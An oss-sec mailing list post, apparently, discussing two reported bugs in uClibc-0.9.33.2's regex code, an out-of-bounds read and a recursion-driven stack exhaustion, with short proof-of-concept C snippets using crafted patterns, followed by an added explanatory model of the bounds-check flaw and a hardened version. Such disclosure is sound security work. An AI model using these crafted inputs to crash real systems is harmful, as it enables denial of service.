oss-sec mailing list archives
Re: two vulns in uClibc-0.9.33.2
From: Peter Korsgaard <peter () korsgaard com>
Date: Fri, 16 Jun 2017 15:12:46 +0200
"fefe" == fefe <qbenjin () qq com> writes:
I found two vulns in uClibc-0.9.33.2 (https://uclibc.org/)
uClibc is dead. Active development happens on uClibc-ng. Is uClibc-ng also affected by these issues?
one is about line 2682 of get_subexp.c :
I take it you are referring to libc/misc/regex/regexec.c?
if (BE (bkref_str_off >= mctx->input.valid_len, 0))
  {
    /* If we are at the end of the input, we cannot match.  */
    if (bkref_str_off >= mctx->input.len)
      break;

    err = extend_buffers (mctx);
    if (BE (err != REG_NOERROR, 0))
      return err;

    buf = (const char *) re_string_get_buffer (&mctx->input);
  }
if (buf [bkref_str_off++] != buf[sl_str - 1])
  break; /* We don't need to search this sub expression
"bkref_str_off >= mctx->input.valid_len": when bkref_str_off == mctx->input.valid_len, the "buf [bkref_str_off++] != buf[sl_str - 1]" case causes a one-bit out-of-bounds read.
The PoC code is like:

#include <regex.h>

regex_t regtmp;
if (regcomp (&regtmp, "(.+)upper\\1^", REG_EXTENDED | REG_ICASE | REG_NOSUB) == 0)
  {
    regmatch_t pmatch[1];
    regexec (&regtmp, "upperupperupperx", 1, pmatch, 0);
    regfree (&regtmp);
  }
The other is about line 1837 of regexec.c:
check_dst_limits_calc_pos_1 (const re_match_context_t *mctx, int boundaries,
                             int subexp_idx, int from_node, int bkref_idx)
.......
  cpos = check_dst_limits_calc_pos_1 (mctx, boundaries, subexp_idx, dst, bkref_idx);
The recursive calls of check_dst_limits_calc_pos_1 cause a DDOS because of stack exhaustion.
The PoC code is like:

#include <regex.h>

regex_t regtmp;
if (regcomp (&regtmp, "\x28\x2E\x3F\x3F\x28\x2E\x3F\x29\x5C\x42\x44\x3F\x3F\x28\x2E\x5C\x32\x29\x2A\x5C\x32\x28\x2E\x3F\x29\x5C\x32\x29\x2A\x5C\x32\xBD", REG_EXTENDED | REG_ICASE | REG_NOSUB) == 0)
  {
    regmatch_t pmatch[1];
    regexec (&regtmp, "\x72\xFF\xFF\xFF\xFF\xBD", 1, pmatch, 0);
    regfree (&regtmp);
  }
-- Bye, Peter Korsgaard
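The first report above describes a loop that passes a bounds check, refills the input buffer once, and then compares a byte without re-checking that the refill actually made that byte valid. The following reduced model of that shape, with the unchecked loop beside a re-checking one, is an added example and not uClibc's code; `input_t`, `extend_buffers_model`, `read_byte`, `bkref_compare_unchecked` and `bkref_compare_checked` are hypothetical names, and the model assumes that a single refill is not guaranteed to reach the byte at the current offset.

```c
#include <stdbool.h>
#include <stddef.h>

/* Simplified model of the match-context input buffer; not uClibc's re_string_t. */
typedef struct {
    const char *buf;   /* matched text */
    size_t valid_len;  /* bytes of buf that are currently valid */
    size_t len;        /* total input length */
} input_t;
/* Model of extend_buffers(): makes one more byte valid, capped at len.
   Assumption of this example: one refill need not reach the byte at `off`. */
static void extend_buffers_model(input_t *in) {
    if (in->valid_len < in->len) in->valid_len++;
}

/* Read one byte, reporting an access beyond valid_len instead of performing it. */
static int read_byte(const input_t *in, size_t off, bool *oob) {
    if (off >= in->valid_len) { *oob = true; return -1; }
    return (unsigned char)in->buf[off];
}
/* Shape of the reported loop: check, refill once, then compare without
   re-checking valid_len. Returns true if sub[0..sub_len) matches buf at off;
   *oob is set if the compare would have read past valid_len. */
bool bkref_compare_unchecked(input_t *in, size_t off, const char *sub,
                             size_t sub_len, bool *oob) {
    *oob = false;
    for (size_t i = 0; i < sub_len; i++, off++) {
        if (off >= in->valid_len) {
            if (off >= in->len) return false;  /* end of input: cannot match */
            extend_buffers_model(in);
        }
        if (read_byte(in, off, oob) != (unsigned char)sub[i]) return false;
    }
    return true;
}
/* Hardened shape: refill until the byte at off is valid, so the compare
   never touches a byte the buffer does not yet hold. */
bool bkref_compare_checked(input_t *in, size_t off, const char *sub,
                           size_t sub_len, bool *oob) {
    *oob = false;
    for (size_t i = 0; i < sub_len; i++, off++) {
        while (off >= in->valid_len) {
            if (off >= in->len) return false;
            extend_buffers_model(in);
        }
        if (read_byte(in, off, oob) != (unsigned char)sub[i]) return false;
    }
    return true;
}
```

With only 4 of 16 bytes valid and a compare starting at offset 6, the unchecked loop refills to 5 bytes and then reads offset 6 anyway, while the checked loop keeps refilling until offset 6 is covered.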